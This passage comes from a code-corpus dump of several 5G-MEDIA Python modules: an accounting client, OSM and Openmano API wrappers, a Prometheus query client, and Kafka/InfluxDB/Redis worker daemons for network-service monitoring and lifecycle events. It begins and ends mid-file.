logger.debug('Open vnf session response: {}, Status code: {}'.format(response.text, response.status_code))
if response.status_code == HTTP_200_OK:
vnf_session_id = int(response.text)
logger.info('Opened vnf session with id {}'.format(vnf_session_id))
return vnf_session_id
elif response.status_code in [HTTP_401_UNAUTHORIZED, HTTP_403_FORBIDDEN]:
logger.warning('Token has expired and open_vnf_session failed; retrying')
return self.open_session_retrial(url, payload)
def open_vdu_session(self, vnf_session_id, vdu):
"""Open a Virtual Deployment Unit (VDU) session.
Args:
vnf_session_id (int): The id of the VNF session where the VDU belongs.
vdu (obj): A VDU object
Returns:
vdu_session_id (int): The VDU session id.
"""
url = BASE_URL + '/openVduSession'
payload = {
'timestamp_sec': time(),
'flavorCpuCount': vdu.vcpu,
'flavorDiskGb': vdu.vdisk,
'flavorMemoryMb': vdu.vram,
'nfvipop_id': vdu.nfvipop_id,
'vdu_id': vdu.uuid,
'vdu_type': 'FAAS_VNF' if 'faas' in vdu.nfvipop_id.lower() else 'PLAIN_VNF',
'vnf_session_id': vnf_session_id
}
logger.info('Attempting to open vdu session with payload {}'.format(payload))
response = self.__client.post(url=url, headers=self.__headers, payload=json.dumps(payload))
logger.debug('Open vdu session response: {}, Status code: {}'.format(response.text, response.status_code))
if response.status_code == HTTP_200_OK:
vdu_session_id = int(response.text)
logger.info('Opened vdu session with id {}'.format(vdu_session_id))
return vdu_session_id
elif response.status_code in [HTTP_401_UNAUTHORIZED, HTTP_403_FORBIDDEN]:
logger.warning('Token has expired and open_vdu_session failed; retrying')
return self.open_session_retrial(url, payload)
def log_vdu_consumption(self, metric_type, metric_value, vdu_session_id):
"""Send measurement of VDU consumption for logging.
Args:
metric_type (str): The type of metric
metric_value (double): The value of metric
vdu_session_id (int): The id of the VDU session that the metric refers to
"""
url = BASE_URL + '/logVduConsumption'
payload = {
'timestamp': time(),
'consumption_type': metric_type,
'consumption_value': metric_value,
'vdu_session_id': vdu_session_id
}
logger.info('Sending vdu consumption with payload {}'.format(payload))
response = self.__client.post(url=url, headers=self.__headers, payload=json.dumps(payload))
logger.debug('Log vdu consumption response: {}, Status code: {}'.format(response.text, response.status_code))
if response.status_code == HTTP_200_OK:
logger.info('Vdu consumption logged successfully')
return
elif response.status_code in [HTTP_401_UNAUTHORIZED, HTTP_403_FORBIDDEN]:
logger.warning('Token has expired and log_vdu_consumption failed; retrying')
self.login()
response = self.__client.post(url=url, headers=self.__headers, payload=json.dumps(payload))
if response.status_code == HTTP_200_OK:
logger.info('Vdu consumption logged successfully')
return json.loads(response.text)['id']
def close_session_retrial(self, url, payload):
"""Retry closing a session after the authorization token has expired.
Args:
url (str): The url of the API call
payload (dict): The payload to send to the API call
"""
self.login()
response = self.__client.post(url=url, headers=self.__headers, payload=json.dumps(payload))
if response.status_code == HTTP_200_OK:
logger.warning('Session was closed')
return
return
def close_session(self, session_id, session_type):
"""Close a NS, VNF or VDU session.
Args:
session_id (int): The ID of the session
session_type (str): The type of the session
"""
url = BASE_URL + CLOSE_SESSIONS[session_type]
payload = {'id': session_id}
logger.info('Closing {} session with id {}'.format(session_type, session_id))
response = self.__client.post(url=url, headers=self.__headers, payload=json.dumps(payload))
logger.debug('Close {} session response: {}, Status code: {}'.format(session_type, response.text,
response.status_code))
if response.status_code == HTTP_200_OK:
logger.info('Successfully closed {} session'.format(session_type))
return
elif response.status_code in [HTTP_401_UNAUTHORIZED, HTTP_403_FORBIDDEN]:
logger.warning('Token has expired and close_session failed; retrying')
self.close_session_retrial(url, payload)
accounting_client = AccountingClient()
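# Hedged usage sketch of the expected call order (NS -> VNF -> VDU), inferred
# from the methods above; `ns` and `vdu` are hypothetical stand-ins for the
# agent's ORM instances and 'vdu' is an assumed key of CLOSE_SESSIONS:
#
# ns_sid = accounting_client.open_ns_session(ns)
# vnf_sid = accounting_client.open_vnf_session(ns_sid, vnf_uuid='...', vnf_name='...')
# vdu_sid = accounting_client.open_vdu_session(vnf_sid, vdu)
# accounting_client.log_vdu_consumption('cpu_util', 12.5, vdu_sid)
# accounting_client.close_session(vdu_sid, 'vdu')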
```
#### File: accounting-agent/nbiapi/nsilcm.py
```python
import logging.config
from django.conf import settings
from httpclient.client import Client
logging.config.dictConfig(settings.LOGGING)
logger = logging.getLogger(__name__)
class NsiLcm(object):
"""NSI LCM Class.
This class serves as a wrapper for the Network Slice Instance Lifecycle Management (NSILCM) part
of the Northbound Interface (NBI) offered by OSM. The methods defined in this class help
retrieve the NSI-related entities of OSM, and instantiate or terminate an NSI.
Attributes:
bearer_token (str): The OSM Authorization Token
Args:
token (str): The OSM Authorization Token
"""
def __init__(self, token):
"""NSI LCM Class Constructor."""
self.__client = Client(verify_ssl_cert=False)
self.bearer_token = token
def get_netslice_list(self):
"""Fetch a list of all Netslice Instances
Returns:
nsi_list_obj (Response): A list of Netslice Instances as a requests object
Examples:
>>> from django.conf import settings
>>> from nbiapi.identity import bearer_token
>>> from nbiapi.nsilcm import NsiLcm
>>> token = bearer_token(settings.OSM_ADMIN_CREDENTIALS.get('username'), settings.OSM_ADMIN_CREDENTIALS.get('password'))
>>> nsilcm = NsiLcm(token)
>>> nsi_list_obj = nsilcm.get_netslice_list()
OSM Cli:
$ osm nsi-list
"""
endpoint = '{}/osm/nsilcm/v1/netslice_instances'.format(settings.OSM_COMPONENTS.get('NBI-API'))
headers = {"Authorization": "Bearer {}".format(self.bearer_token), "Accept": "application/json"}
response = self.__client.get(endpoint, headers)
logger.debug("Request `GET {}` returns HTTP status `{}`, headers `{}` and body `{}`."
.format(response.url, response.status_code, response.headers, response.text))
return response
def get_netslice(self, nsi_uuid):
"""Fetch details of a specific Netslice Instance
Args:
nsi_uuid (str): The UUID of the Netslice Instance to fetch details for
Returns:
nsi_obj (Response): A Netslice Instance as a requests object
Examples:
>>> from django.conf import settings
>>> from nbiapi.identity import bearer_token
>>> from nbiapi.nsilcm import NsiLcm
>>> token = bearer_token(settings.OSM_ADMIN_CREDENTIALS.get('username'), settings.OSM_ADMIN_CREDENTIALS.get('password'))
>>> nsilcm = NsiLcm(token)
>>> nsi_obj = nsilcm.get_netslice('07048175-660b-404f-bbc9-5be7581e74de')
OSM Cli:
$ osm nsi-show 07048175-660b-404f-bbc9-5be7581e74de
"""
endpoint = '{}/osm/nsilcm/v1/netslice_instances/{}'.format(settings.OSM_COMPONENTS.get('NBI-API'), nsi_uuid)
headers = {"Authorization": "Bearer {}".format(self.bearer_token), "Accept": "application/json"}
response = self.__client.get(endpoint, headers)
logger.debug("Request `GET {}` returns HTTP status `{}`, headers `{}` and body `{}`."
.format(response.url, response.status_code, response.headers, response.text))
return response
```
#### File: accounting-agent/nbiapi/nslcm.py
```python
import logging.config
from django.conf import settings
from requests import Response
from httpclient.client import Client
logging.config.dictConfig(settings.LOGGING)
logger = logging.getLogger(__name__)
class NsLcm(object):
"""NS LCM Class.
This class serves as a wrapper for the Network Service Lifecycle Management (NSLCM) part
of the Northbound Interface (NBI) offered by OSM. The methods defined in this class help
retrieve the NS-related entities of OSM, i.e. NS and VNFs or terminate an NS instance.
Attributes:
bearer_token (str): The OSM Authorization Token
Args:
token (str): The OSM Authorization Token
"""
def __init__(self, token):
"""NS LCM Class Constructor."""
self.__client = Client(verify_ssl_cert=False)
self.bearer_token = token
def get_ns_list(self):
"""Fetch a list of all NS Instances
Returns:
ns_list_obj (Response): A list of NSs as a requests object
Examples:
>>> from django.conf import settings
>>> from nbiapi.identity import bearer_token
>>> from nbiapi.nslcm import NsLcm
>>> token = bearer_token(settings.OSM_ADMIN_CREDENTIALS.get('username'), settings.OSM_ADMIN_CREDENTIALS.get('password'))
>>> nslcm = NsLcm(token)
>>> ns_list_obj = nslcm.get_ns_list()
OSM Cli:
$ osm ns-list
"""
endpoint = '{}/osm/nslcm/v1/ns_instances'.format(settings.OSM_COMPONENTS.get('NBI-API'))
headers = {"Authorization": "Bearer {}".format(self.bearer_token), "Accept": "application/json"}
response = self.__client.get(endpoint, headers)
logger.debug("Request `GET {}` returns HTTP status `{}`, headers `{}` and body `{}`."
.format(response.url, response.status_code, response.headers, response.text))
return response
def get_ns(self, ns_uuid):
"""Fetch details of a specific NS Instance
Args:
ns_uuid (str): The UUID of the NS to fetch details for
Returns:
ns_obj (Response): A NS as a requests object
Examples:
>>> from django.conf import settings
>>> from nbiapi.identity import bearer_token
>>> from nbiapi.nslcm import NsLcm
>>> token = bearer_token(settings.OSM_ADMIN_CREDENTIALS.get('username'), settings.OSM_ADMIN_CREDENTIALS.get('password'))
>>> nslcm = NsLcm(token)
>>> ns_obj = nslcm.get_ns('07048175-660b-404f-bbc9-5be7581e74de')
OSM Cli:
$ osm ns-show 07048175-660b-404f-bbc9-5be7581e74de
"""
endpoint = '{}/osm/nslcm/v1/ns_instances/{}'.format(settings.OSM_COMPONENTS.get('NBI-API'), ns_uuid)
headers = {"Authorization": "Bearer {}".format(self.bearer_token), "Accept": "application/json"}
response = self.__client.get(endpoint, headers)
logger.debug("Request `GET {}` returns HTTP status `{}`, headers `{}` and body `{}`."
.format(response.url, response.status_code, response.headers, response.text))
return response
def terminate_ns(self, ns_uuid):
"""Terminate a NS Instance.
Args:
ns_uuid (str): The UUID of the NS to terminate
Returns:
response (Response): A requests object
Examples:
>>> from django.conf import settings
>>> from nbiapi.identity import bearer_token
>>> from nbiapi.nslcm import NsLcm
>>> token = bearer_token(settings.OSM_ADMIN_CREDENTIALS.get('username'), settings.OSM_ADMIN_CREDENTIALS.get('password'))
>>> nslcm = NsLcm(token)
>>> response = nslcm.terminate_ns('07048175-660b-4<PASSWORD>')
"""
endpoint = '{}/osm/nslcm/v1/ns_instances/{}/terminate'.format(settings.OSM_COMPONENTS.get('NBI-API'), ns_uuid)
headers = {"Authorization": "Bearer {}".format(self.bearer_token), "Accept": "application/json"}
response = self.__client.post(endpoint, headers)
logger.debug("Request `GET {}` returns HTTP status `{}`, headers `{}` and body `{}`."
.format(response.url, response.status_code, response.headers, response.text))
return response
def get_vnf_list(self):
"""Fetch a list of all VNFs.
Returns:
vnf_list_obj (Response): A list of VNFs as a requests object
Examples:
>>> from django.conf import settings
>>> from nbiapi.identity import bearer_token
>>> from nbiapi.nslcm import NsLcm
>>> token = bearer_token(settings.OSM_ADMIN_CREDENTIALS.get('username'), settings.OSM_ADMIN_CREDENTIALS.get('password'))
>>> nslcm = NsLcm(token)
>>> vnf_list_obj = nslcm.get_vnf_list()
OSM Cli:
$ osm vnf-list
"""
endpoint = '{}/osm/nslcm/v1/vnf_instances'.format(settings.OSM_COMPONENTS.get('NBI-API'))
headers = {"Authorization": "Bearer {}".format(self.bearer_token), "Accept": "application/json"}
response = self.__client.get(endpoint, headers)
logger.debug("Request `GET {}` returns HTTP status `{}`, headers `{}` and body `{}`."
.format(response.url, response.status_code, response.headers, response.text))
return response
def get_vnf(self, vnf_uuid):
"""Fetch details of a specific VNF
Args:
vnf_uuid (str): The UUID of the VNF to fetch details for
Returns:
vnf_obj (Response): A VNF as a requests object
Examples:
>>> from django.conf import settings
>>> from nbiapi.identity import bearer_token
>>> from nbiapi.nslcm import NsLcm
>>> token = bearer_token(settings.OSM_ADMIN_CREDENTIALS.get('username'), settings.OSM_ADMIN_CREDENTIALS.get('password'))
>>> nslcm = NsLcm(token)
>>> vnf_obj = nslcm.get_vnf('a5f506e9-45c7-42fd-b12d-b5c657ed87fb')
OSM Cli:
$ osm vnf-show a5f506e9-45c7-42fd-b12d-b5c657ed87fb
"""
endpoint = '{}/osm/nslcm/v1/vnf_instances/{}'.format(settings.OSM_COMPONENTS.get('NBI-API'), vnf_uuid)
headers = {"Authorization": "Bearer {}".format(self.bearer_token), "Accept": "application/json"}
response = self.__client.get(endpoint, headers)
logger.debug("Request `GET {}` returns HTTP status `{}`, headers `{}` and body `{}`."
.format(response.url, response.status_code, response.headers, response.text))
return response
def get_vnf_list_by_ns(self, ns_uuid):
"""Fetch list of VNFs for specific NS Instance.
Args:
ns_uuid (str): The UUID of the NS to fetch VNFs for.
Returns:
vnf_list_obj (Response): A list of VNFs as a requests object.
Examples:
>>> from django.conf import settings
>>> from nbiapi.identity import bearer_token
>>> from nbiapi.nslcm import NsLcm
>>> token = bearer_token(settings.OSM_ADMIN_CREDENTIALS.get('username'), settings.OSM_ADMIN_CREDENTIALS.get('password'))
>>> nslcm = NsLcm(token)
>>> vnf_list_obj = nslcm.get_vnf('a5f506e9-45c7-42fd-b12d-b5c657ed87fb')
"""
endpoint = '{}/osm/nslcm/v1/vnf_instances?nsr-id-ref={}'.format(settings.OSM_COMPONENTS.get('NBI-API'), ns_uuid)
headers = {"Authorization": "Bearer {}".format(self.bearer_token), "Accept": "application/json"}
response = self.__client.get(endpoint, headers)
logger.debug("Request `GET {}` returns HTTP status `{}`, headers `{}` and body `{}`."
.format(response.url, response.status_code, response.headers, response.text))
return response
```
#### File: accounting-agent/openmanoapi/datacenters.py
```python
import logging
from httpclient.client import Client
from openmanoapi.config import BASE_URL
logger = logging.getLogger(__name__)
class Datacenter(object):
""" Class for Datacenter API
See more: https://osm.etsi.org/wikipub/index.php/RO_Northbound_Interface#Datacenters
"""
def __init__(self):
self.__client = Client(verify_ssl_cert=True)
def get_list(self, openmano_tenant_id, headers=None, query_params=None):
"""Fetch the list of Openmano datacenter entities by given tenant ID
Args:
openmano_tenant_id (str): The tenant UUID
headers (dict, optional): the required HTTP headers, e.g., Accept: application/json
query_params (dict, optional): Additional arguments will be passed to the request.
Returns:
obj: a requests object
Examples:
>>> from httpclient.client import Client
>>> from openmanoapi.datacenters import Datacenter
>>> dc = Datacenter()
>>> datacenters = dc.get_list('f35d06af-ed24-40ca-87c1-4e6ae81008b4')
>>> print(int(datacenters.status_code))
200
>>> print(datacenters.json())
{"datacenters": [{"vim_url": "http://192.168.1.194/identity/v2.0", "created_at": "2018-05-04T09:07:22", "type": "openstack", "uuid": "8e430688-4f7a-11e8-b3e2-00163edc3180", "name": "devstack-pike"} ] }
Openmano cli:
$ openmano datacenter-list -a --debug
"""
endpoint = '{}/{}/datacenters'.format(BASE_URL, openmano_tenant_id)
response = self.__client.get(endpoint, headers=headers, query_params=query_params)
logger.debug("Request `GET {}` returns HTTP status `{}`, headers `{}` and body `{}`."
"".format(response.url, response.status_code, response.headers, response.text))
return response
def get(self, openmano_tenant_id, datacenter_id, headers=None, query_params=None):
"""Fetch details for an Openmano datacenter by given tenant ID and datacenter ID
Args:
openmano_tenant_id (str): The tenant UUID
datacenter_id (str): The datacenter UUID
headers (dict, optional): the required HTTP headers, e.g., Accept: application/json
query_params (dict, optional): Additional arguments will be passed to the request.
Returns:
obj: a requests object
Examples:
>>> from httpclient.client import Client
>>> from openmanoapi.datacenters import Datacenter
>>> dc = Datacenter()
>>> datacenters = dc.get('f35d06af-ed24-40ca-87c1-4e6ae81008b4', '8e430688-4f7a-11e8-b3e2-00163edc3180')
>>> print(int(datacenters.status_code))
200
>>> print(datacenters.json())
Openmano cli:
$ openmano datacenter-list {datacenter_id} -d
"""
endpoint = '{}/{}/datacenters/{}'.format(BASE_URL, openmano_tenant_id, datacenter_id)
response = self.__client.get(endpoint, headers=headers, query_params=query_params)
logger.debug("Request `GET {}` returns HTTP status `{}`, headers `{}` and body `{}`."
"".format(response.url, response.status_code, response.headers, response.text))
return response
```
#### File: accounting-agent/openmanoapi/tenants.py
```python
import logging
from httpclient.client import Client
from openmanoapi.config import BASE_URL
logger = logging.getLogger(__name__)
class Tenant(object):
""" Class for Tenant API
See more: https://osm.etsi.org/wikipub/index.php/RO_Northbound_Interface#Tenants
"""
def __init__(self):
self.__client = Client(verify_ssl_cert=True)
def get_list(self, headers=None, query_params=None):
"""Fetch the list of Openmano tenants
Args:
headers (dict, optional): the required HTTP headers, e.g., Accept: application/json
query_params (dict, optional): Additional arguments will be passed to the request.
Returns:
obj: a requests object
Examples:
>>> from httpclient.client import Client
>>> from openmanoapi.tenants import Tenant
>>> tn = Tenant()
>>> tenants = tn.get_list()
>>> print(int(tenants.status_code))
200
>>> print(tenants.json())
{"tenants": [{"created_at": "2018-05-03T16:00:04", "description": null, "uuid": "f35d06af-ed24-40ca-87c1-4e6ae81008b4", "name": "osm"} ] }
Openmano cli:
$ openmano tenant-list -d
"""
endpoint = '{}/tenants'.format(BASE_URL)
response = self.__client.get(endpoint, headers=headers, query_params=query_params)
logger.debug("Request `GET {}` returns HTTP status `{}`, headers `{}` and body `{}`."
"".format(response.url, response.status_code, response.headers, response.text))
return response
def get(self, openmano_tenant_id, headers=None, query_params=None):
"""Fetch details for an Openmano tenant by given tenant ID
Args:
openmano_tenant_id (str): The tenant UUID
headers (dict, optional): the required HTTP headers, e.g., Accept: application/json
query_params (dict, optional): Additional arguments will be passed to the request.
Returns:
obj: a requests object
Examples:
>>> from httpclient.client import Client
>>> from openmanoapi.tenants import Tenant
>>> tn = Tenant()
>>> tenant = tn.get('f35d06af-ed24-40ca-87c1-4e6ae81008b4')
>>> print(int(tenant.status_code))
200
>>> print(tenant.json())
Openmano cli:
$ openmano tenant-list {openmano_tenant_id} -d
"""
endpoint = '{}/tenants/{}'.format(BASE_URL, openmano_tenant_id)
response = self.__client.get(endpoint, headers=headers, query_params=query_params)
logger.debug("Request `GET {}` returns HTTP status `{}`, headers `{}` and body `{}`."
"".format(response.url, response.status_code, response.headers, response.text))
return response
``` |
{
"source": "5g-media/kubernetes-prometheus-publisher",
"score": 3
} |
#### File: prometheus_client/v1/query_range.py
```python
import logging.config
import urllib3
from httpclient.client import Client
from settings import PROMETHEUS, LOGGING
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
logging.config.dictConfig(LOGGING)
logger = logging.getLogger("publisher")
class QueryRange(object):
"""QueryRange Class.
Attributes:
bearer_token (str, optional): The Prometheus Authorization Token (if any)
Methods:
get(query, from_time, to_time, step): perform a query_range request in Prometheus API
"""
def __init__(self, token=None):
"""Class Constructor."""
self.__client = Client(verify_ssl_cert=False)
self.bearer_token = token
def get(self, query, from_time, to_time, step=14):
""" Perform a query_range request in Prometheus API (PromQL)
Args:
query (str): The query
from_time (str): The start datetime
to_time (str): The end datetime
step (int): The used step in the query. Default value is 14 secs.
Returns:
object: A list of NSs as a requests object
"""
endpoint = 'http://{}:{}/api/v1/query_range'.format(PROMETHEUS.get('HOST'),
PROMETHEUS.get('PORT'))
headers = {"Accept": "application/json"}
endpoint += "?query={}&start={}&end={}&step={}".format(query, from_time, to_time, step)
logger.debug("Prometheus web service: {}".format(endpoint))
response = self.__client.get(url=endpoint, headers=headers)
return response
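# Hedged usage sketch; the PromQL expression and the RFC3339 timestamps below
# are placeholders, not values used elsewhere by the publisher:
#
# qr = QueryRange()
# resp = qr.get(query='sum(rate(container_cpu_usage_seconds_total[1m]))',
#               from_time='2019-06-01T10:00:00Z', to_time='2019-06-01T10:05:00Z')
# # On success, resp.json()['data']['result'] holds the matrix of (timestamp, value) samples.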
``` |
{
"source": "5g-media/mape-data-importer",
"score": 4
} |
#### File: 5g-media/mape-data-importer/utils.py
```python
from datetime import datetime
from exceptions import *
def convert_str_to_datetime_timestamp(timestamp_str):
"""Convert a timestamp from str type to datetime object.
Args:
timestamp_str (str): The timestamp of the monitoring metric
Returns:
Object: The timestamp as datetime object
"""
formatter = '%Y-%m-%dT%H:%M:%S.%f'
if not isinstance(timestamp_str, str):
raise InvalidStrTimestamp("The type of the timestamp `{}` is not str".format(timestamp_str))
return datetime.strptime(timestamp_str, formatter)
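# Illustrative example (the input must match '%Y-%m-%dT%H:%M:%S.%f', i.e.
# without the trailing 'Z' that format_str_timestamp() below appends):
#   convert_str_to_datetime_timestamp('2019-06-01T10:00:00.123456')
#   --> datetime(2019, 6, 1, 10, 0, 0, 123456)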
def convert_utc_timestamp_to_unixtime_ms(timestamp_obj):
"""Convert a timestamp from datetime object to unix-time.
Args:
timestamp_obj (Object): The timestamp as datetime object
Returns:
int: The timestamp as unix-time (in microseconds)
"""
if not isinstance(timestamp_obj, datetime):
raise NotValidDatetimeTimestamp("The type of the timestamp `{}` is not datetime object".format(timestamp_obj))
unixtime_ms = timestamp_obj.timestamp() * pow(10, 6)
return unixtime_ms
def format_str_timestamp(timestamp_str):
"""Format a str timestamp adding teh char `Z` in the end of it, if needed
For instance: the '2014-12-10T12:00:00.123123' is converted to '2014-12-10T12:00:00.123123Z'.
Args:
timestamp_str (str): The timestamp of the monitoring metric
Returns:
str: The timestamp as datetime object
"""
if not timestamp_str.endswith('Z'):
return "{}Z".format(timestamp_str)
return timestamp_str
```
#### File: 5g-media/mape-data-importer/vce_worker.py
```python
import json
import logging.config
from kafka import KafkaConsumer
from datetime import datetime
from influxdb import InfluxDBClient
from utils import format_str_timestamp
from metric_formatter import format_monitoring_metric_per_source_origin
from exceptions import InvalidStrTimestamp, NotValidDatetimeTimestamp, MetricNameNotFound, \
MetricValueNotFound, \
VimUuidTypeNotSupported, VimTypeNotFound, NsUuidNotFound, NsdUuidNotFound, VnfUuidNotFound, \
VnfdUuidNotFound, \
VduUuidNotFound
from settings import KAFKA_SERVER, KAFKA_CLIENT_ID, KAFKA_API_VERSION, KAFKA_VCE_TOPIC, LOGGING, \
INFLUX_DATABASES, INFLUX_RETENTION_POLICY, KAFKA_VCE_GROUP_ID
logging.config.dictConfig(LOGGING)
logger = logging.getLogger(__name__)
def init_kafka_consumer():
# See more: https://kafka-python.readthedocs.io/en/master/apidoc/KafkaConsumer.html
consumer = KafkaConsumer(bootstrap_servers=KAFKA_SERVER, client_id=KAFKA_CLIENT_ID,
enable_auto_commit=True,
api_version=KAFKA_API_VERSION, group_id=KAFKA_VCE_GROUP_ID)
return consumer
def init_influx_client():
# See more: http://influxdb-python.readthedocs.io/en/latest/examples.html
influx_client = InfluxDBClient(host=INFLUX_DATABASES['default']['HOST'],
port=INFLUX_DATABASES['default']['PORT'],
username=INFLUX_DATABASES['default']['USERNAME'],
password=INFLUX_DATABASES['default']['PASSWORD'],
database=INFLUX_DATABASES['default']['NAME'], )
return influx_client
def main():
consumer = init_kafka_consumer()
consumer.subscribe(pattern=KAFKA_VCE_TOPIC)
influx_client = init_influx_client()
# Set retention policy in db
influx_client.create_retention_policy(name=INFLUX_RETENTION_POLICY['NAME'],
duration=INFLUX_RETENTION_POLICY['DURATION'],
replication=INFLUX_RETENTION_POLICY['REPLICATION'],
default=True)
# metric_x stands for the min bitrate of the selected Profile while metric_y stands for the
# max bitrate of the selected Profile
allowed_metrics = ['enc_speed', 'enc_dbl_time', 'gop_size', 'max_bitrate', 'num_frame',
'num_fps', 'enc_quality', 'act_bitrate', 'avg_bitrate', 'metric_x',
'metric_y', 'metric_z']
for msg in consumer:
try:
monitoring_metrics = list()
# Get & decode the message
message = json.loads(msg.value.decode('utf-8', 'ignore'))
# Format the given timestamp properly
unix_time = message['utc_time']
unix_ts = str(unix_time)[:10]
dt = datetime.utcfromtimestamp(float(unix_ts))
timestamp = dt.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
for metric in message:
if metric not in allowed_metrics:
continue
try:
float(message[metric])
except:
continue
vdu_mac = message.get('id', None)
if vdu_mac is None:
continue
vdu_name = get_instance(vdu_mac)
if vdu_name is None:
continue
temp = {
"measurement": "vce_vnf_measurements",
"time": timestamp,
"tags": {
"metric": metric,
"vdu_mac": vdu_mac,
},
"fields": {
"value": float(message[metric]),
"vdu_name": vdu_name
}
}
monitoring_metrics.append(temp)
# Insert the record in the db
influx_client.write_points(monitoring_metrics)
except json.decoder.JSONDecodeError as je:
logger.warning("JSONDecodeError: {}".format(je))
except Exception as e:
logger.exception(e)
continue
def get_instance(index):
instances = {
'06:00:cc:74:72:95': 'vCE-1',
'06:00:cc:74:72:99': 'vCE-2'
}
if index in instances.keys():
return instances[index]
return None
if __name__ == '__main__':
main()
``` |
{
"source": "5g-media/mape-data-lcm",
"score": 2
} |
#### File: 5g-media/mape-data-lcm/daemon.py
```python
import redis
import json
import yaml
import logging.config
from kafka import KafkaConsumer
from influxdb import InfluxDBClient
from utils import convert_byte_to_str, get_vdus_info, compose_redis_key
from exceptions import NsValueIsNotDict, NsUuidDoesNotExist
from settings import KAFKA_SERVER, KAFKA_CLIENT_ID, KAFKA_API_VERSION, KAFKA_NS_MANAGER_TOPIC, INFLUX_DATABASES, \
REDIS_HOST, REDIS_PORT, REDIS_NFVI_DB, REDIS_EXPIRATION_SECONDS, LOGGING
logging.config.dictConfig(LOGGING)
logger = logging.getLogger(__name__)
def main():
# See more: https://kafka-python.readthedocs.io/en/master/apidoc/KafkaConsumer.html
consumer = KafkaConsumer(bootstrap_servers=KAFKA_SERVER, client_id=KAFKA_CLIENT_ID, enable_auto_commit=True,
value_deserializer=lambda v: yaml.safe_load(v.decode('utf-8', 'ignore')),
api_version=KAFKA_API_VERSION, )
consumer.subscribe(KAFKA_NS_MANAGER_TOPIC)
# See more: http://influxdb-python.readthedocs.io/en/latest/examples.html
influx_client = InfluxDBClient(host=INFLUX_DATABASES['default']['HOST'], port=INFLUX_DATABASES['default']['PORT'],
username=INFLUX_DATABASES['default']['USERNAME'],
password=INFLUX_DATABASES['default']['PASSWORD'],
database=INFLUX_DATABASES['default']['NAME'])
# See more: https://redis-py.readthedocs.io/en/latest/
redis_conn = redis.Redis(host=REDIS_HOST, port=REDIS_PORT, db=REDIS_NFVI_DB)
# Run each message in "ns" topic
for message in consumer:
logger.info(message)
message_key = convert_byte_to_str(message.key)
message_value = message.value
if message_key == "instantiate":
"""
An indicative sample of message is available in the file `samples/instantiate.json`.
Since the NS instantiation is still in progress, we skip this info.
"""
pass
elif message_key == "instantiated":
"""
When a new Network Service has been successfully instantiated through OSM, a new entry is added in Redis.
Redis is used as a cache to avoid continuous requests to the OSM-r4 NBI API in the translation process.
The translator can check if there is info in Redis related to the metric that is under processing.
If there is (a `hit`), no call to the OSM r4 NBI API is needed. In the `miss` case, OSM will be used.
The key is a composition of <vim_name>:<vdu_uuid>. Use lower function in `vim_name`.
An indicative sample of message is available in the file `samples/instantiated.json`.
"""
pass
# # Get the operational state of the process
# ns_operation_state = message_value['operationState']
# if ns_operation_state != 'COMPLETED':
# continue
# ns_uuid = message_value.get('nsr_id', None)
#
# # Find the vdus for the new Network Service
# vdu_records = get_vdus_info(ns_uuid=ns_uuid)
#
# # Update the entries in the redis, if needed
# for vdu_record in vdu_records:
# vim_name = vdu_record.get("vim", {}).get('name', None)
# if vim_name is None:
# continue
#
# vdu_uuid = vdu_record.get("vdu", {}).get('id', None)
# if vdu_uuid is None:
# continue
#
# # Compose the redis key
# redis_key = compose_redis_key(vim_name, vdu_uuid)
#
# # Check if there is value for the given key. If no, insert a value. Otherwise, do nothing.
# existing_value = redis_conn.get(name=redis_key)
# if existing_value is None:
# redis_conn.set(name=redis_key, value=json.dumps(vdu_record), ex=REDIS_EXPIRATION_SECONDS)
# logger.info("[Redis] Add key: `{}` with value: `{}`".format(redis_key, vdu_record))
elif message_key == "terminate":
"""
In this step, the NS termination is still in progress. However, this is the proper time to remove the entries
from Redis, since the VIM information can still be retrieved by invoking the ns-instance web service.
An indicative sample of message is available in the file `samples/terminate.json`
"""
ns_uuid = message_value.get('nsInstanceId', None)
if ns_uuid is None:
continue
# Remove the entries related to the `ns_uuid` in Redis.
vdu_records = get_vdus_info(ns_uuid=ns_uuid)
for vdu_record in vdu_records:
vim_name = vdu_record.get("vim", {}).get('name', None)
if vim_name is None:
continue
vdu_uuid = vdu_record.get("vdu", {}).get('id', None)
if vdu_uuid is None:
continue
# Check if there are keys with the pattern: *:{vdu_uuid}.
# If yes, delete the relevant entry. Otherwise, do nothing.
vdu_keys = redis_conn.keys(pattern="*:{}".format(vdu_uuid))
vtranscoder_keys = redis_conn.keys(pattern="*_metrics:*")
spectator_keys = redis_conn.keys(pattern="spectators.vtranscoder3d.metrics:transcoder*")
matched_keys = vdu_keys + vtranscoder_keys + spectator_keys
for k in matched_keys:
existing_value = redis_conn.get(name=k)
if existing_value is not None:
redis_conn.delete(k)
logger.info("[Redis] Delete key: `{}`".format(k))
elif message_key == "terminated":
"""
When a new Network Service is terminated through OSM, delete the data from `InfluxDB` and the Redis.
The key is a composition of <vim_name>:<vdu_uuid>.
An indicative sample of message is available in the file `samples/terminated.json`
"""
# Get the operational state of the process
ns_operation_state = message_value['operationState']
if ns_operation_state != 'COMPLETED':
continue
# Delete the relevant redis entries
spectator_keys = redis_conn.keys(pattern="spectators.vtranscoder3d.metrics:transcoder*")
spectator_vnf_keys = redis_conn.keys(pattern="spectators.vtranscoder3d.metrics:vnf*")
matched_keys = spectator_keys + spectator_vnf_keys
for k in matched_keys:
existing_value = redis_conn.get(name=k)
if existing_value is not None:
redis_conn.delete(k)
logger.info("[Redis] Delete key: `{}`".format(k))
ns_uuid = message_value.get('nsr_id', None)
if ns_uuid is None:
continue
# # Remove the series with the "ns_uuid" tag from the Influxdb
# try:
# logger.info("[InfluxDB] Delete series with tag `ns_uuid`={}".format(ns_uuid))
# influx_client.delete_series(database=INFLUX_DATABASES['default']['NAME'], tags={'ns_uuid': ns_uuid})
# except (NsValueIsNotDict, NsUuidDoesNotExist, Exception) as exc:
# logger.exception(exc)
elif message_key == "action":
"Future usage"
pass
elif message_key == "show":
"Future usage"
pass
elif message_key == "deleted":
"Future usage"
pass
if __name__ == '__main__':
main()
``` |
{
"source": "5g-media/mape-executor",
"score": 2
} |
#### File: mape-executor/actions/utils.py
```python
from nbiapi.identity import bearer_token
from nbiapi.vnf import Vnf
from settings import OSM_ADMIN_CREDENTIALS
def get_vcdn_net_interfaces(ns_uuid, search_for_mid_cache="vCache-mid-vdu",
search_for_edge_cache="vCache-edge-vdu"):
""" Get the network interfaces of the scaled VNF as well as the current count-index
Args:
ns_uuid (str): The NS uuid, in which the scaled VNF belongs to
search_for_mid_cache (str): Search for the Mid vCache by given explicit name
